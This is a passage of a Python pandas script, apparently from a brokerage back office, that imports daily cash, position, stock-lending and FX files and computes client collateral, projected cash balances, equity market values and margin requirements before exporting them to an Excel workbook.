xlsx_to_df(mssd_file)\n\n\tmsse_df = msse_df.rename(columns={\"SEGFUND_NAME\":\"SEG_FUND_NAME\"})\n\t# msse_df[\"EQUITY_HKD\"] = msse_df[\"CARRY_FORWARD_HKD\"]\n\tmsse_df = msse_df.drop([\"BROUGHT_FORWARD\", \"CARRY_FORWARD\"], axis=1)\n\n\tmssd_df = mssd_df.rename(columns={\"BROUGHT_FORWARD\":\"DAY_BEGIN_BAL\", \"CARRY_FORWARD\":\"LEDG_BAL\"})\n\tmssd_df[\"UPnL\"] = round(mssd_df[\"EQUITY_HKD\"]/mssd_df[\"EXCHANGE_RATE\"]-mssd_df[\"LEDG_BAL\"]-mssd_df[\"MARGIN\"], 2)\n\n\tmssd_df = mssd_df.drop([\"EQUITY_HKD\"], axis=1)\n\tcash_df = pd.concat([msse_df, mssd_df], ignore_index=True).fillna(0)\n\texch_df = cash_df[[\"CURRENCY\", \"EXCHANGE_RATE\"]].drop_duplicates()\n\n\treturn cash_df, exch_df\n\ndef import_positions(exch_df):\n\tmsse_file = CONST_DIC[\"msse_pos_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tprint (msse_file)\n\tmsseo_file = CONST_DIC[\"msseo_pos_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tprint (msseo_file)\n\tmssd_file = CONST_DIC[\"mssd_pos_path\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\"))\n\tprint (mssd_file)\n\t\n\tmsse_df = xlsx_to_df(msse_file)\n\tmsseo_df = xlsx_to_df(msseo_file)\n\tmssd_df = xlsx_to_df(mssd_file)\n\n\tmsseo_df[\"INSTRUMENT_TYPE\"] = \"OPTIONS\"\n\tmsseo_df = msseo_df.rename(columns={\"INSTRUMENT_CLASS\":\"INSTRUMENT_CODE\",\"INSTRUMENT\":\"INSTRUMENT_NAME\",\"OPEN_LONG_QTY\":\"LONG_QTY\",\"OPEN_SHT_QTY\":\"SHORT_QTY\",\"CLOS_PRICE\":\"CLOSING_PRICE\",\"SETL_CCY_CDE\":\"TRADE_CURRENCY\"})\n\n\tmsse_df = pd.merge(msse_df, exch_df.rename(columns={\"CURRENCY\":\"SETL_CCY_CDE\"}), on=[\"SETL_CCY_CDE\"], how=\"inner\")\n\tmsseo_df = pd.merge(msseo_df, exch_df.rename(columns={\"CURRENCY\":\"TRADE_CURRENCY\"}), on=[\"TRADE_CURRENCY\"], how=\"inner\")\n\tmssd_df = pd.merge(mssd_df, exch_df.rename(columns={\"CURRENCY\":\"TRADE_CURRENCY\"}), on=[\"TRADE_CURRENCY\"], how=\"inner\")\n\t\n\treturn msse_df, pd.concat([msseo_df[[\"ACCOUNT\",\"MARKET_CODE\",\"INSTRUMENT_CODE\",\"INSTRUMENT_NAME\",\"INSTRUMENT_TYPE\",\"LONG_QTY\",\"SHORT_QTY\",\"TRADE_CURRENCY\",\"CLOSING_PRICE\",\"EXCHANGE_RATE\"]], \n\t\tmssd_df[[\"ACCOUNT\",\"MARKET_CODE\",\"INSTRUMENT_CODE\",\"INSTRUMENT_NAME\",\"INSTRUMENT_TYPE\",\"LONG_QTY\",\"SHORT_QTY\",\"TRADE_CURRENCY\",\"CLOSING_PRICE\",\"EXCHANGE_RATE\",\"UNREALIZE_PL\"]]], ignore_index=True)\n\ndef import_sbl():\n\tinput_file = CONST_DIC[\"stk_sbl_path\"].replace(\"????\", CONST_DIC[\"cur_dt\"].strftime(\"%m%d\"))\n\tprint (input_file)\n\n\tstk_df = pd.read_csv(input_file, delimiter='\\t', skiprows=1)\n\tstk_df = stk_df[[\"CODE\", \"DOMICILE\"]].rename(columns={\"CODE\":\"STOCK\"})\n\n\tinput_file = CONST_DIC[\"os_sbl_path\"].replace(\"????\", CONST_DIC[\"cur_dt\"].strftime(\"%m%d\"))\n\tprint (input_file)\n\t\n\tos_df = pd.read_csv(input_file, delimiter='\\t', skiprows=1)\n\tos_df.columns = [re.sub(r\"[\\*\\.#/\\$%\\\"\\(\\)& : ]\", \"\", c) for c in os_df.columns]\n\tos_df[\"STOCK\"] = os_df[\"STOCK\"].astype('str')\n\tos_df = pd.merge(os_df, stk_df, on=[\"STOCK\"], how=\"left\")\n\tos_df = os_df.fillna(0)\n\t\n\tinput_file = CONST_DIC[\"pd_sbl_path\"].replace(\"????\", CONST_DIC[\"cur_dt\"].strftime(\"%m%d\"))\n\tprint (input_file)\n\t\n\tpd_df = pd.read_csv(input_file, delimiter='\\t', skiprows=1)\n\tpd_df.columns = [re.sub(r\"[\\*\\.#/\\$%\\\"\\(\\)& : ]\", \"\", c) for c in pd_df.columns]\n\tpd_df[\"STOCK\"] = pd_df[\"STOCK\"].astype('str')\n\tpd_df = pd.merge(pd_df, stk_df, on=[\"STOCK\"], how=\"left\")\n\tpd_df = pd_df.fillna(0)\n\n\tinput_file = max(glob.iglob(CONST_DIC[\"fx_sbl_path\"]))\n\tprint (input_file)\n\n\tfx_df = pd.read_csv(input_file, delimiter=';', skiprows=1)\n\tfx_df = fx_df.rename(columns={\"CODE\":\"CURRENCY\", \"EXRATE_7DP\":\"EXCHANGE_RATE\"})\n\tfx_df[\"EXCHANGE_RATE\"] = 1/fx_df[\"EXCHANGE_RATE\"]\n\treturn os_df, pd_df, fx_df\n\ndef os_sbl_calc(client_df, sbl_df):\n\tcoll_arr = []\n\n\tfor os_index, os_row in sbl_df.loc[ (sbl_df.CPTY.isin(client_df.SBLCode)) & (sbl_df.STOCK != 0) & (sbl_df.STOCK != 'nan') ].iterrows():\n\t\tcoll_arr.append([ os_row[\"BGNREF\"], client_df.loc[client_df.SBLCode == os_row[\"CPTY\"]].iloc[0].FAName, os_row[\"DOMICILE\"], os_row[\"LNCUR\"], str(os_row[\"STOCK\"]), os_row[\"SNAME\"], \"EQUITY\", \n\t\t\t\t\t\tdatetime.datetime.strptime(str(int(os_row[\"TRADE\"])), \"%Y%m%d\").strftime(\"%Y-%m-%d\"), datetime.datetime.strptime(str(int(os_row[\"SSET_DT\"])), \"%Y%m%d\").strftime(\"%Y-%m-%d\"), \n\t\t\t\t\t\tos_row[\"PRICE\"], (os_row[\"QTY\"] if os_row[\"PTYPE\"] == \"B\" else -os_row[\"QTY\"] ), \n\t\t\t\t\t\t(os_row[\"LNVAL\"] if os_row[\"PTYPE\"] == \"B\" else -os_row[\"LNVAL\"]), \n\t\t\t\t\t\t(os_row[\"LNVAL\"] if os_row[\"PTYPE\"] == \"B\" else -os_row[\"LNVAL\"])*os_row[\"COLLMGN\"]/100,\n\t\t\t\t\t\tos_row[\"LNRATE\"]/100, os_row[\"MIN_FEE\"] ])\n\n\tos_trd_df = pd.DataFrame(coll_arr, columns=[\"BGNREF\", \"CPTY\", \"CCY\", \"LNCCY\", \"STOCK\", \"SNAME\", \"INSTYPE\", \"TRD_DT\", \"SSET_DT\", \"PRICE\", \"OS_QTY\", \"OS_LOANVALUE\", \"OS_COLLATERAL\", \"COLLRATE\", \"MIN_FEE\"])\n\treturn os_trd_df.groupby([\"BGNREF\", \"CPTY\", \"CCY\", \"LNCCY\", \"STOCK\", \"SNAME\", \"INSTYPE\", \"TRD_DT\", \"SSET_DT\", \"PRICE\", \"COLLRATE\"], as_index=False).agg({\"OS_QTY\":\"sum\", \"OS_LOANVALUE\":\"sum\", \"OS_COLLATERAL\":\"sum\", \"MIN_FEE\":\"sum\"})\n\ndef pd_sbl_calc(client_df, sbl_df):\n\tcoll_arr = []\n\n\tfor pd_index, pd_row in sbl_df.loc[ (sbl_df.CPTY.isin(client_df.SBLCode)) & (sbl_df.STOCK != 0) & (sbl_df.STOCK != 'nan') ].iterrows():\n\t\tcoll_arr.append([ pd_row[\"BGNREF\"], client_df.loc[client_df.SBLCode == pd_row[\"CPTY\"]].iloc[0].FAName, pd_row[\"DOMICILE\"], pd_row[\"LNCUR\"], str(pd_row[\"STOCK\"]), pd_row[\"SNAME\"], \"EQUITY\", \n\t\t\t\t\t\tdatetime.datetime.strptime(str(int(pd_row[\"TRADE\"])), \"%Y%m%d\").strftime(\"%Y-%m-%d\"),datetime.datetime.strptime(str(int(pd_row[\"SSET_DT\"])), \"%Y%m%d\").strftime(\"%Y-%m-%d\"), \n\t\t\t\t\t\tpd_row[\"LNVAL\"]/pd_row[\"QTY\"], (pd_row[\"QTY\"] if ((pd_row[\"BL\"] == \"L\" and pd_row[\"STATUS\"] == \"R\") or (pd_row[\"BL\"] == \"B\" and pd_row[\"STATUS\"] == \"L\")) else -pd_row[\"QTY\"] ), \n\t\t\t\t\t\t(pd_row[\"LNVAL\"] if ((pd_row[\"BL\"] == \"L\" and pd_row[\"STATUS\"] == \"R\") or (pd_row[\"BL\"] == \"B\" and pd_row[\"STATUS\"] == \"L\")) else -pd_row[\"LNVAL\"]), \n\t\t\t\t\t\t(pd_row[\"LNVAL\"] if ((pd_row[\"BL\"] == \"L\" and pd_row[\"STATUS\"] == \"R\") or (pd_row[\"BL\"] == \"B\" and pd_row[\"STATUS\"] == \"L\")) else -pd_row[\"LNVAL\"])*pd_row[\"COLLMGN\"]/100,\n\t\t\t\t\t\tpd_row[\"LNRATE\"]/100, pd_row[\"MIN_FEE\"] ])\n\n\tpd_trd_df = pd.DataFrame(coll_arr, columns=[\"BGNREF\", \"CPTY\", \"CCY\", \"LNCCY\", \"STOCK\", \"SNAME\", \"INSTYPE\", \"TRD_DT\", \"SSET_DT\", \"PRICE\", \"PD_QTY\", \"PD_LOANVALUE\", \"PD_COLLATERAL\", \"COLLRATE\", \"MIN_FEE\"])\n\treturn pd_trd_df.groupby([\"BGNREF\", \"CPTY\", \"CCY\", \"LNCCY\", \"STOCK\", \"SNAME\", \"INSTYPE\", \"TRD_DT\", \"SSET_DT\", \"PRICE\", \"COLLRATE\"], as_index=False).agg({\"PD_QTY\":\"sum\", \"PD_LOANVALUE\":\"sum\", \"PD_COLLATERAL\":\"sum\", \"MIN_FEE\":\"sum\"})\n\ndef cash_acc(client_df, cash_df, pd_coll_df, unsetl_trd_df):\n\tweekday_arr = list( rrule(DAILY, dtstart=CONST_DIC[\"cur_dt\"], count=CONST_DIC[\"setl_dt_range\"], byweekday=(MO,TU,WE,TH,FR)) )\n\tday_header = list(map(lambda x: x.strftime(\"%d-%b-%Y\"), weekday_arr))\n\t\n\tcash_client_df = pd.merge(cash_df[[\"ACCOUNT\", \"CURRENCY\", \"DAY_BEGIN_BAL\", \"EXCHANGE_RATE\", \"LEDG_BAL\", \"MARGIN\", \"CONF_USETL_BAL\", \"STATEMENT_DATE\", \"ACCRUED_INTEREST\", \"UPnL\", \"HOLD_FUND_BAL\"]], \n\t\t\tclient_df[[\"FAName\", \"AccountNo\", \"BaseCCY\", \"AccountType\"]].drop_duplicates().rename(columns={\"FAName\":\"Client\",\"AccountNo\":\"ACCOUNT\"}), on=[\"ACCOUNT\"], how=\"inner\")\n\t\n\tproj_df = pd.DataFrame(columns=[\"Client\", \"Currency\", \"FxRate\", \"SetlDt\", \"Opening\", \"Movement\", \"Projected\"])\n\tfor cln_idx, cln_row in cash_client_df.groupby([\"Client\", \"CURRENCY\",\"EXCHANGE_RATE\"], as_index=False).agg({\"DAY_BEGIN_BAL\":\"sum\", \"LEDG_BAL\":\"sum\"}).iterrows():\n\t\tfor idx, weekday in enumerate(weekday_arr):\n\t\t\tif idx == 0:\n\t\t\t\tcoll_sum = pd_coll_df.loc[(pd_coll_df.CPTY == cln_row[\"Client\"]) & (pd_coll_df.CCY == cln_row[\"CURRENCY\"]) & (pd_coll_df.SSET_DT.astype('datetime64') > weekday)][\"PD_COLLATERAL\"].sum() \n\t\t\t\ttrd_sum = unsetl_trd_df.loc[(unsetl_trd_df.Client == cln_row[\"Client\"]) & (unsetl_trd_df.CCY_CDE == cln_row[\"CURRENCY\"]) & (unsetl_trd_df.SETL_DATE.astype('datetime64[ns]') > weekday)][\"AMOUNT\"].sum() \n\t\t\t\tmovement = coll_sum + trd_sum + float(cln_row[\"LEDG_BAL\"])-float(cln_row[\"DAY_BEGIN_BAL\"])\n\t\t\t\tproj_df = proj_df.append({\"Client\": cln_row[\"Client\"], \"Currency\": cln_row[\"CURRENCY\"], \"FxRate\": cln_row[\"EXCHANGE_RATE\"], \"SetlDt\": -1, \"Opening\": float(cln_row[\"DAY_BEGIN_BAL\"]),\n\t\t\t\t\t\"Movement\": movement, \"Projected\": float(cln_row[\"DAY_BEGIN_BAL\"])+movement }, ignore_index=True)\n\n\t\t\t\tproj_df = proj_df.append({\"Client\": cln_row[\"Client\"], \"Currency\": cln_row[\"CURRENCY\"], \"FxRate\": cln_row[\"EXCHANGE_RATE\"], \"SetlDt\": str(idx), \"Opening\": float(cln_row[\"DAY_BEGIN_BAL\"]),\n\t\t\t\t\t\"Movement\": float(cln_row[\"LEDG_BAL\"])-float(cln_row[\"DAY_BEGIN_BAL\"]), \"Projected\": float(cln_row[\"LEDG_BAL\"]) }, ignore_index=True)\n\n\t\t\telse:\n\t\t\t\tlast_close = proj_df.loc[(proj_df.Client == cln_row[\"Client\"]) & (proj_df.Currency == cln_row[\"CURRENCY\"]) & (proj_df.SetlDt == str(idx-1))].iloc[0].Projected\n\n\t\t\t\tcoll_sum = pd_coll_df.loc[(pd_coll_df.CPTY == cln_row[\"Client\"]) & (pd_coll_df.CCY == cln_row[\"CURRENCY\"]) & (pd_coll_df.SSET_DT.astype('datetime64') == weekday)][\"PD_COLLATERAL\"].sum() \n\t\t\t\ttrd_sum = unsetl_trd_df.loc[(unsetl_trd_df.Client == cln_row[\"Client\"]) & (unsetl_trd_df.CCY_CDE == cln_row[\"CURRENCY\"]) & (unsetl_trd_df.SETL_DATE.astype('datetime64[ns]') == weekday)][\"AMOUNT\"].sum() \n\t\t\t\tmovement = coll_sum + trd_sum\n\n\t\t\t\tproj_df = proj_df.append({\"Client\": cln_row[\"Client\"], \"Currency\": cln_row[\"CURRENCY\"], \"FxRate\": cln_row[\"EXCHANGE_RATE\"], \"SetlDt\": str(idx), \"Opening\": last_close, \"Movement\": movement, \"Projected\": last_close+movement }, ignore_index=True) \n\n\t\n\treturn cash_client_df, proj_df\n\ndef eqt_ls_mv(client_df, pos_df, os_coll_df, pd_coll_df, exch_df):\n\tpos_arr = []\n\n\texch_dict = list(exch_df.to_dict(orient=\"list\").values())\n\texch_dict = {v:k for k,v in dict(zip(*exch_dict)).items()}\n\t\n\tpos_df = pd.merge(pos_df, client_df[[\"FAName\", \"AccountNo\", \"AccountType\"]].drop_duplicates().rename(columns={\"FAName\":\"Client\", \"AccountNo\":\"ACCOUNT\"}), on=[\"ACCOUNT\"], how=\"inner\")\n\tconsol_pos_df = pos_df.groupby([\"Client\", \"AccountType\", \"SETL_CCY_CDE\", \"MARKET_CODE\", \"INSTRUMENT_TYPE\", \"INSTRUMENT_CODE\", \"INSTRUMENT_NAME\", \"DISCOUNT_RATIO\", \"CLOSING_PRICE\"], as_index=False).agg({\"SETTLED_QTY\":\"sum\", \"PEND_SETL_QTY\":\"sum\", \"MARKET_VALUE\":\"sum\"})\n\n\tg1_inv_df = pd.merge(os_coll_df, pd_coll_df, on=[\"BGNREF\", \"CPTY\", \"CCY\", \"LNCCY\", \"STOCK\", \"SNAME\", \"INSTYPE\", \"TRD_DT\", \"SSET_DT\", \"PRICE\", \"COLLRATE\"], how=\"outer\")\n\tg1_inv_df = g1_inv_df.groupby([\"CPTY\", \"CCY\", \"STOCK\", \"SNAME\", \"INSTYPE\", \"PRICE\"], as_index=False).agg({\"OS_QTY\":\"sum\", \"OS_LOANVALUE\":\"sum\", \"PD_QTY\":\"sum\", \"PD_LOANVALUE\":\"sum\"})\n\tg1_inv_df = g1_inv_df.rename(columns={\"CPTY\":\"Client\", \"CCY\":\"SETL_CCY_CDE\", \"STOCK\":\"INSTRUMENT_CODE\", \"INSTYPE\":\"INSTRUMENT_TYPE\", \"PRICE\":\"CLOSING_PRICE\"})\n\tg1_inv_df.loc[g1_inv_df.SETL_CCY_CDE == \"HKD\", \"INSTRUMENT_CODE\"] = g1_inv_df[\"INSTRUMENT_CODE\"].apply(lambda x: (\"00000\" + str(x))[-5:] )\n\tg1_inv_df[\"MARKET_CODE\"] = g1_inv_df[\"SETL_CCY_CDE\"].map(G1_MKT_DICT)\n\n\tconsol_pos_df = pd.merge(consol_pos_df.loc[consol_pos_df[\"INSTRUMENT_TYPE\"] != \"STRUCTPRD\"], g1_inv_df, on=[\"Client\", \"SETL_CCY_CDE\", \"MARKET_CODE\", \"INSTRUMENT_CODE\", \"INSTRUMENT_TYPE\", \"CLOSING_PRICE\"], how=\"outer\")\n\tconsol_pos_df[\"INSTRUMENT_NAME\"] = consol_pos_df[\"INSTRUMENT_NAME\"].fillna(consol_pos_df[\"SNAME\"])\n\tconsol_pos_df[\"DISCOUNT_RATIO\"] = consol_pos_df[\"DISCOUNT_RATIO\"].fillna(0)\n\tconsol_pos_df[\"SETTLED_QTY\"] = consol_pos_df[\"SETTLED_QTY\"].fillna(0)\n\tconsol_pos_df[\"PEND_SETL_QTY\"] = consol_pos_df[\"PEND_SETL_QTY\"].fillna(0)\n\tconsol_pos_df[\"OS_QTY\"] = consol_pos_df[\"OS_QTY\"].fillna(0)\n\tconsol_pos_df[\"PD_QTY\"] = consol_pos_df[\"PD_QTY\"].fillna(0)\n\tconsol_pos_df[\"AccountType\"] = consol_pos_df[\"AccountType\"].fillna('S')\n\tconsol_pos_df[\"EXCHANGE_RATE\"] = consol_pos_df[\"SETL_CCY_CDE\"].map(exch_dict)\n\t\n\tfor pos_index, pos_row in consol_pos_df.iterrows():\n\t\tins_code = str(pos_row[\"INSTRUMENT_CODE\"])\n\t\t\n\t\tmkt_price = pos_row[\"CLOSING_PRICE\"]\n\t\t\n\t\tsd_qty = pos_row[\"SETTLED_QTY\"] + pos_row[\"OS_QTY\"]\n\t\ttd_qty = pos_row[\"SETTLED_QTY\"] + pos_row[\"PEND_SETL_QTY\"] + pos_row[\"OS_QTY\"] + pos_row[\"PD_QTY\"]\n\n\t\tif sd_qty > 0 and pos_row[\"AccountType\"] == \"S\":\n\t\t\tacc_type = \"X\"\n\t\telse:\n\t\t\tif pos_row[\"INSTRUMENT_TYPE\"] == \"EQUITY\":\n\t\t\t\tacc_type = pos_row[\"AccountType\"]\n\t\t\telse:\n\t\t\t\tacc_type = \"B\"\n\n\t\tpos_arr.append([ pos_row[\"Client\"], pos_row[\"SETL_CCY_CDE\"], ins_code, pos_row[\"MARKET_CODE\"], \n\t\t\tins_code.lstrip('0')+\" \"+MKT_DICT[pos_row[\"MARKET_CODE\"]]+\" Equity\" if pos_row[\"INSTRUMENT_TYPE\"] == \"EQUITY\" else pos_row[\"INSTRUMENT_CODE\"], pos_row[\"INSTRUMENT_NAME\"], pos_row[\"INSTRUMENT_TYPE\"], mkt_price,\n\t\t\tsd_qty, td_qty, sd_qty*mkt_price, td_qty*mkt_price, pos_row[\"DISCOUNT_RATIO\"], pos_row[\"EXCHANGE_RATE\"], acc_type ])\n\n\teqt_mv_df = pd.DataFrame(pos_arr, columns=[\"Client\", \"Currency\", \"InstrumentCode\", \"Market\", \"BBGCode\", \"InstrumentName\", \"InstrumentType\", \"MktPrice\", \"SdQty\", \"TdQty\", \"SdMarketValue\", \"TdMarketValue\", \"MarginRatio\", \"FxRate\", \"AccountType\" ])\n\t\n\teqt_mv_df[\"DiscountValue\"] = eqt_mv_df[\"TdMarketValue\"] * (1 - eqt_mv_df[\"MarginRatio\"])\n\treturn eqt_mv_df.sort_values(by=['Client', 'Currency', 'InstrumentType', 'InstrumentCode'], ascending=[True, True, True, True])\n\ndef eqt_shrt_coll(client_df, exposure_df):\n\texposure_df.loc[exposure_df.Transaction == \"L-Principal\", \"Transaction\"] = \"Loan\"\n\texposure_df = exposure_df.loc[exposure_df.Currency != \"\"]\n\texposure_df[\"SBLCode\"] = exposure_df[\"Counterparty\"].apply(lambda x: x.split(' ')[0] )\n\texposure_df[\"MarketExposure\"] = exposure_df[\"MarketExposure\"].apply(lambda x: str(x).replace(',','')).astype(\"float64\")\n\texposure_df[\"MarginExposure\"] = exposure_df[\"MarginExposure\"].apply(lambda x: str(x).replace(',','')).astype(\"float64\")\n\tloan_df = pd.merge(exposure_df, client_df, on=[\"SBLCode\"], how=\"inner\").groupby([\"FAName\", \"Currency\", \"Transaction\", \"Margin\"], as_index=False).agg({\"MarketExposure\":\"sum\",\"MarginExposure\":\"sum\"})\n\treturn loan_df.rename(columns={\"FAName\":\"Client\"})\n\ndef fut_exp(client_df, pos_df):\n\tpos_arr = []\n\n\tfor pos_index, pos_row in pos_df.loc[ (pos_df[\"ACCOUNT\"].isin(client_df.loc[(client_df.AccountType == \"F\") ].AccountNo))].iterrows():\n\t\tif int(pos_row[\"LONG_QTY\"]) > 0:\n\t\t\tpos_arr.append([ client_df.loc[client_df.AccountNo == pos_row[\"ACCOUNT\"]].iloc[0].FAName, pos_row[\"TRADE_CURRENCY\"], \n\t\t\t\tpos_row[\"INSTRUMENT_CODE\"], pos_row[\"MARKET_CODE\"], pos_row[\"INSTRUMENT_CODE\"], pos_row[\"INSTRUMENT_NAME\"], pos_row[\"INSTRUMENT_TYPE\"], \n\t\t\t\t\"L\", pos_row[\"CLOSING_PRICE\"], int(pos_row[\"LONG_QTY\"]), int(pos_row[\"LONG_QTY\"]), 0, 0, 0, pos_row[\"EXCHANGE_RATE\"], pos_row[\"UNREALIZE_PL\"] ])\n\t\tif int(pos_row[\"SHORT_QTY\"]) > 0:\n\t\t\tpos_arr.append([ client_df.loc[client_df.AccountNo == pos_row[\"ACCOUNT\"]].iloc[0].FAName, pos_row[\"TRADE_CURRENCY\"], \n\t\t\t\tpos_row[\"INSTRUMENT_CODE\"], pos_row[\"MARKET_CODE\"], pos_row[\"INSTRUMENT_CODE\"], pos_row[\"INSTRUMENT_NAME\"], pos_row[\"INSTRUMENT_TYPE\"], \n\t\t\t\t\"S\", pos_row[\"CLOSING_PRICE\"], -int(pos_row[\"SHORT_QTY\"]), -int(pos_row[\"SHORT_QTY\"]), 0, 0, 0, pos_row[\"EXCHANGE_RATE\"], pos_row[\"UNREALIZE_PL\"] ])\n\n\treturn pd.DataFrame(pos_arr, columns=[\"Client\", \"Currency\", \"InstrumentCode\", \"Market\", \"BBGCode\", \"InstrumentName\", \"InstrumentType\", \"LS\", \"MktPrice\", \"SdQty\", \"TdQty\", \"SdMarketValue\", \"TdMarketValue\", \"MarginRatio\", \"FxRate\", \"UPnl\" ])\n\ndef margin_req(balance_df, eqt_shrt_coll_df, eqt_mv_df):\n\tlong_mv_df = eqt_mv_df.loc[(eqt_mv_df.AccountType == \"L\") | (eqt_mv_df.AccountType == \"B\")].groupby([\"Client\", \"Currency\",\"AccountType\"], as_index=False).agg({\"TdMarketValue\":\"sum\",\"SdMarketValue\":\"sum\",\"DiscountValue\":\"sum\"}).rename(columns={\"TdMarketValue\":\"TDMV\",\"SdMarketValue\":\"SDMV\",\"DiscountValue\":\"LongDiscountValue\"})\n\tshrt_mv_df = eqt_mv_df.loc[eqt_mv_df.AccountType == \"S\"].groupby([\"Client\", \"Currency\",\"AccountType\"], as_index=False).agg({\"TdMarketValue\":\"sum\",\"SdMarketValue\":\"sum\"}).rename(columns={\"TdMarketValue\":\"STDMV\",\"SdMarketValue\":\"SSDMV\"})\n\texcs_mv_df = eqt_mv_df.loc[eqt_mv_df.AccountType == \"X\"].groupby([\"Client\", \"Currency\",\"AccountType\"], as_index=False).agg({\"TdMarketValue\":\"sum\",\"SdMarketValue\":\"sum\",\"DiscountValue\":\"sum\"}).rename(columns={\"TdMarketValue\":\"ETDMV\",\"SdMarketValue\":\"ESDMV\",\"DiscountValue\":\"ExcsDiscountValue\"})\n\n\tmargin_df = balance_df.groupby([\"Client\", \"AccountType\", \"CURRENCY\", \"EXCHANGE_RATE\"], as_index=False).agg({\"LEDG_BAL\":\"sum\", \"CONF_USETL_BAL\":\"sum\", \"ACCRUED_INTEREST\":\"sum\", \"MARGIN\":\"sum\", \"UPnL\":\"sum\", \"HOLD_FUND_BAL\":\"sum\"})\n\tmargin_df = margin_df.rename(columns={\"CURRENCY\":\"Currency\", \"EXCHANGE_RATE\":\"FxRate\", \"CONF_USETL_BAL\":\"PendingCash\", \"MARGIN\":\"Margin\", \"LEDG_BAL\":\"SettledCash\", \"ACCRUED_INTEREST\":\"Accrued\"})\n\tmargin_df = pd.merge(margin_df, eqt_mv_df[[\"Client\", \"Currency\", \"AccountType\", \"FxRate\"]].drop_duplicates(), on=[\"Client\", \"Currency\",\"AccountType\", \"FxRate\"], how=\"outer\")\n\n\tmargin_df = margin_df.replace({0:None})\n\n\tshrt_coll_df = eqt_shrt_coll_df.groupby([\"Client\", \"Currency\", \"Transaction\"]).agg({\"MarginExposure\":\"sum\"}).transpose().stack([0,1]).reset_index()\n\tshrt_coll_df = shrt_coll_df.drop([\"level_0\"], axis=1)\n\tshrt_coll_df[\"AccountType\"] = \"S\"\n\tmargin_df = pd.merge(margin_df, shrt_coll_df, on=[\"Client\", \"Currency\", \"AccountType\"], how=\"left\")\n\t\n\tmargin_df[\"Margin\"] = margin_df[\"Margin\"].fillna(margin_df[\"Cash Pool L\"])\n\tmargin_df = margin_df.rename(columns={\"Loan\":\"Collateral\"})\n\tmargin_df = margin_df.drop([\"Cash Pool L\"], axis=1)\n\t\n\tmargin_df = pd.merge(margin_df, long_mv_df, on=[\"Client\", \"Currency\", \"AccountType\"], how=\"left\")\n\tmargin_df = pd.merge(margin_df, shrt_mv_df, on=[\"Client\", \"Currency\", \"AccountType\"], how=\"left\")\n\tmargin_df = pd.merge(margin_df, excs_mv_df, on=[\"Client\", \"Currency\", \"AccountType\"], how=\"left\")\n\n\tmargin_df[\"SDMV\"] = margin_df[\"SDMV\"].fillna(margin_df[\"ESDMV\"])\n\tmargin_df[\"SDMV\"] = margin_df[\"SDMV\"].fillna(margin_df[\"SSDMV\"])\n\tmargin_df[\"TDMV\"] = margin_df[\"TDMV\"].fillna(margin_df[\"STDMV\"])\n\tmargin_df[\"TDMV\"] = margin_df[\"TDMV\"].fillna(margin_df[\"ETDMV\"])\n\tmargin_df[\"LongDiscountValue\"] = margin_df[\"LongDiscountValue\"].fillna(margin_df[\"ExcsDiscountValue\"])\n\tmargin_df.loc[(margin_df.AccountType == 'L') | (margin_df.AccountType == 'B') | (margin_df.AccountType == 'X'), \"Margin\"] = -margin_df[\"LongDiscountValue\"]\n\tmargin_df.loc[(margin_df.AccountType == 'L') | (margin_df.AccountType == 'B'), \"Collateral\"] = margin_df[\"TDMV\"] - margin_df[\"LongDiscountValue\"]\n\tmargin_df.loc[margin_df.AccountType == 'X', \"Collateral\"] = margin_df[\"SDMV\"] - margin_df[\"LongDiscountValue\"]\n\tmargin_df.loc[margin_df.AccountType == 'F', \"Collateral\"] = margin_df[\"SettledCash\"] + margin_df[\"UPnL\"]\n\tmargin_df.loc[margin_df.AccountType == 'B', \"SettledCash\"] = 0\n\n\treturn margin_df.drop([\"LongDiscountValue\", \"ExcsDiscountValue\", \"ESDMV\", \"SSDMV\", \"STDMV\", \"ETDMV\", \"UPnL\"], axis=1).fillna(0)\n\ndef merge_sbl(os_coll_df, pd_coll_df):\n\tos_coll_df[\"LOAN_TYPE\"] = \"OS\"\n\tpd_coll_df[\"LOAN_TYPE\"] = \"PD\"\n\treturn pd.concat([os_coll_df.rename(columns={x : x.replace(\"OS_\", \"\") for x in os_coll_df.columns if \"OS_\" in x}), \n\t\tpd_coll_df.rename(columns={x : x.replace(\"PD_\", \"\") for x in pd_coll_df.columns if \"PD_\" in x}) ], ignore_index=True)\n\ndef consol_output(margin_df, cash_df, eqt_mv_df, deriv_exp_df, eqt_shrt_coll_df, unsetl_trd, sbl_inv_df, fx_sbl_df):\n\tconsol_xlsx = pd.ExcelWriter(CONST_DIC[\"consol_data_file\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\")))\n\tmargin_df.to_excel(consol_xlsx, \"margin\", index=False)\n\tcash_df.to_excel(consol_xlsx, \"cash\", index=False)\n\teqt_mv_df.to_excel(consol_xlsx, \"eqt_mv\", index=False)\n\tderiv_exp_df.to_excel(consol_xlsx, \"deriv_exp\", index=False)\n\teqt_shrt_coll_df.to_excel(consol_xlsx, \"eqt_shrt_coll\", index=False)\n\tunsetl_trd.to_excel(consol_xlsx, \"unsetl_trd\", index=False)\n\tsbl_inv_df.to_excel(consol_xlsx, \"sbl_inv\", index=False)\n\tfx_sbl_df.to_excel(consol_xlsx, \"g1_fx\", index=False)\n\tconsol_xlsx.save()\n\tprint (CONST_DIC[\"consol_data_file\"].replace(\"????????\", CONST_DIC[\"cur_dt\"].strftime(\"%Y%m%d\")))\n\n\treturn\n\ndef main():\n\t# CONST_DIC[\"cur_dt\"] = datetime.datetime.strptime(\"20181001\", \"%Y%m%d\")\n\tclient_df = import_client()\n\ttrd_df = import_trd(client_df)\n\tcash_df, exch_df = import_cash()\n\teqt_pos_df, fut_pos_df = import_positions(exch_df)\n\texposure_df = import_exposure()\n\tos_sbl_df, pd_sbl_df, fx_sbl_df = import_sbl()\n\n\tpd_coll_df = pd_sbl_calc(client_df, pd_sbl_df)\n\tos_coll_df = os_sbl_calc(client_df, os_sbl_df)\n\t\n\teqt_mv_df = eqt_ls_mv(client_df, eqt_pos_df, os_coll_df, pd_coll_df, exch_df)\n\tderiv_exp_df = fut_exp(client_df, fut_pos_df)\n\teqt_shrt_coll_df = eqt_shrt_coll(client_df, exposure_df)\n\t\n\tbalance_df, proj_df = cash_acc(client_df, cash_df, pd_coll_df, trd_df)\n\tsbl_inv_df = merge_sbl(os_coll_df, pd_coll_df)\n\tmargin_df = 